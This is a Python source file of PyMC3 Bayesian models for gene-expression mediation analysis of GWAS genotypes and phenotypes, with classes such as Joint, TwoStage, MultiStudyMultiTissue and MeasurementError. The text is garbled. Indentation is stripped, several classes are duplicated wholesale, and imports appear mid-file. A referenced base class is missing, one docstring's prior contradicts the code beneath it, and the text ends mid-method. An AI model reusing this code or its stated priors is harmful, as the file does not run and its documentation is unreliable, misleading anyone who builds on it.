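# A post-sampling sketch (hypothetical: assumes a pymc3-era trace sampled from
# the model above). The Bernoulli indicator's posterior mean is the probability
# that the mediator component is active; with the flat p = [0.5, 0.5] prior,
# its posterior odds equal the Bayes factor.
def mediator_bayes_factor(trace):
    p_mediator = trace['mediator_model'].mean()
    return p_mediator / (1.0 - p_mediator)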
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
        Expression ~ N(X\\beta, \\sigma_exp)
        P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
        P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
        Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
        P(\\alpha) ~ Uniform(-10, 10)
        P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
            tau_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
            lambda_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
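# --- Illustrative sketch (added): the horseshoe construction used in
# _create_model_horseshoe, in isolation. The global scale tau shrinks every
# SNP effect towards zero while the local scales lambda_j let individual
# effects escape the shrinkage.
def _demo_horseshoe_prior(n_snps=10):
    with pm.Model() as horseshoe_model:
        tau = pm.HalfCauchy('tau', beta=1)
        lam = pm.HalfCauchy('lam', beta=1, shape=(1, n_snps))
        pm.Normal('beta', mu=0, tau=1 / (tau * tau * lam * lam),
                  shape=(1, n_snps))
    return horseshoe_model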
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Laplace(0, m_laplace_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ N(alpha_mu, alpha_sd), one alpha per study
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
m_laplace_beta (int): P(\\beta) ~ Laplace(0, m_laplace_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
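# --- Illustrative sketch (added): using NonMediated as the null in a model
# comparison. NonMediated has no `alpha`, so calculate_ppc (which summarises
# alpha) does not apply; compare information criteria directly instead.
def _demo_null_comparison(gwas_gen, gwas_phen, mediated_model, mediated_trace):
    null_model = NonMediated()
    null_trace = null_model.run(gwas_gen=gwas_gen, gwas_phen=gwas_phen)
    null_dic = pm.stats.dic(null_trace, null_model.cached_model)
    med_dic = pm.stats.dic(mediated_trace, mediated_model.cached_model)
    return med_dic - null_dic  # negative values favour the mediated model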
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
# Imports required by the model classes below. `tinvlogit` is assumed to be a
# local inverse-logit helper, and `BayesianModel` (the base class) is defined
# in the full copy later in this file.
import numpy as np
import pymc3 as pm
import theano.tensor as t
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
coef_mean (array): prior means for the SNP effect sizes
coef_sd (array): prior standard deviations for the SNP effect sizes
p_sigma_beta (int): scale of the HalfCauchy prior on the phenotype noise
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
coef_mean (array): prior means for the SNP effect sizes
coef_sd (array): prior standard deviations for the SNP effect sizes
p_sigma_beta (int): scale of the HalfCauchy prior on the phenotype noise
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ N(0, 1)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
lambda_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Laplace(0, m_laplace_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ N(alpha_mu, alpha_sd), one alpha per study
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
m_laplace_beta (int): P(\\beta) ~ Laplace(0, m_laplace_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
